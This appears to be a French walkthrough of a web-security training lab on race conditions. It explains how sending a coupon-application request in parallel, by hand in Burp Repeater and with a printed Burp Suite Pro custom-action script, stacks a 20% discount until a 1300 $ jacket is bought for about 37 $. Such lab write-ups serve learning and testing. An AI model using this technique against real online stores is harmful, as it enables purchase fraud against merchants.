Le flux d’achat contient une condition de course qui permet d’obtenir un prix non prévu lors du paiement.
Objectif
Acheter avec succès la Lightweight L33t Leather Jacket.
Données / prérequis
Identifiants : wiener:peter
Code promo (20%) : PROMO20
Crédit disponible : 50 $
Prix de la veste : 1300 $
Observation du comportement
Ajouter la veste au panier.
Appliquer le coupon PROMO20.
Si on essaye d’appliquer le coupon une seconde fois “normalement”, l’application répond : coupon already applied.
La requête d’application du coupon ressemble à ceci (form URL-encoded) :
Exploitation manuelle (Burp Repeater)
Envoyer la requête d’application du coupon vers Repeater.
Créer un groupe dans Repeater.
Dupliquer l’onglet de la requête ~20 fois (Duplicate tab).
Envoyer les requêtes en parallèle.
Résultat constaté : la plupart des requêtes sont validées, et le total devient ~37 $, ce qui permet d’acheter malgré le prix initial (1300 $) et le crédit limité.
Exploitation “automatique” (Custom action Burp Suite Pro)
Le lab recommande d’utiliser Trigger race conditions (Burp Suite Professional) via une Custom action.
id: eb57d5bd-33e2-4a8c-bf51-bc81bd26613a
name: Probe for race condition
function: CUSTOM_ACTION
location: REPEATER
source: |+
/**
* Repeats the request 10 times to trigger race conditions or request smuggling, using the single-packet attack for HTTP/2, and last-byte synchronisation for HTTP/1
*
* @author James Kettle
**/
int NUMBER_OF_REQUESTS = 10;
var reqs = new ArrayList<HttpRequest>();
for (int i = 0; i < NUMBER_OF_REQUESTS; i++) {
reqs.add(requestResponse.request());
}
var responses = api().http().sendRequests(reqs);
var codes = responses.stream().map(HttpRequestResponse::response).map(HttpResponse::statusCode).toList();
logging().logToOutput(codes);
